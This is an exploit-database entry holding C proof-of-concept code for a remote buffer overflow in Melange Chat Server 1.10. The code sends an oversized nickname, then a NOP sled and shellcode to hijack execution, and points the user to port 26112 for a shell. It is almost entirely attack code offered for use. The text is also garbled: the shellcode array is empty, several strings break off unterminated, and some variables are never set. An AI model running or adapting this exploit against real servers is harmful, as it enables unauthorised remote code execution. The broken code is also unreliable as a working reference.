Melange Chat Server 1.10 Remote Buffer Overflow Exploit

ID SSV:5195
Type seebug
Reporter Root
Modified 2006-10-24T00:00:00


No description provided by source.

   Proof of Concept for Melange Chat Server 1.10
   a lame remote bof exploit by innerphobia <> 12/24/02

   Credits go to:
   - iDefense Labs for the advisory
   - blink for discovering the bug
   - Irian for the shellcode

   With careful calculation it is *possible* to control even the EIP,
   not just one byte of EIP.
   There are to a few things that will happen if we use a wrong ret address:
   1. Seg fault / shut down.
   2. Keep on going < nothing happens >.

   Code tested on Suse 8.0 and RH 7.3
   Merry Xmas :)

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>

// magic numbers begin here
#define ADDR 0xbfffd490
#define NICKLEN 49
#define BUFFLEN 463
// magic numbers end

// brutally copied from Irian's cy.c
char evil[]=

int main(int argc,char **argv){
    int i,j=0,sock,port = 6666;
    char *host;
    char nick[NICKLEN],buff[BUFFLEN];
    struct hostent *htent;
    struct sockaddr_in serv_addr;
    long jump = ADDR;
    u_long *ptr = (u_long *)buff;

        printf("Usage : %s [hostname] [ret address in hex (0x41414141)] 

    if(argc>2) sscanf(argv[2],"0x%lx",&jump);
    if(argc>3) port=atoi(argv[3]);

    if((htent = gethostbyname(argv[1])) != NULL && (sock = 
socket(AF_INET,SOCK_STREAM,0)) != -1){

        serv_addr.sin_family = AF_INET;
        serv_addr.sin_port = htons(port);

        if(!connect(sock,(struct sockaddr *)&serv_addr,sizeof(serv_addr))){

            printf("Connected to %s at %d [0x%lx]\nTrying to send %d chars 

            memset(nick,'A',sizeof(nick)),memcpy(nick,"/NICK ",6);

            if(send(sock,nick,sizeof(nick),0) == -1)
                perror("Sending nickname failed\n"),exit(1);

            for(i=0;i<sizeof(buff);i+=4) *(ptr++)=jump;
            for(i=0;i<sizeof(buff)-200-strlen(evil);i++) buff[i]=0x90;
            for(j=0;j<strlen(evil);j++) buff[i++]=evil[j];

            printf("Trying to send overflow string\n");

            if(send(sock,buff,sizeof(buff),0) == -1)
                perror("Sending overflow failed :(\n"),exit(1);

            printf("Now try to connect to host : %s port : 26112\n",host);
        else printf("Can't connect to %s at %d\n",host,port),exit(1);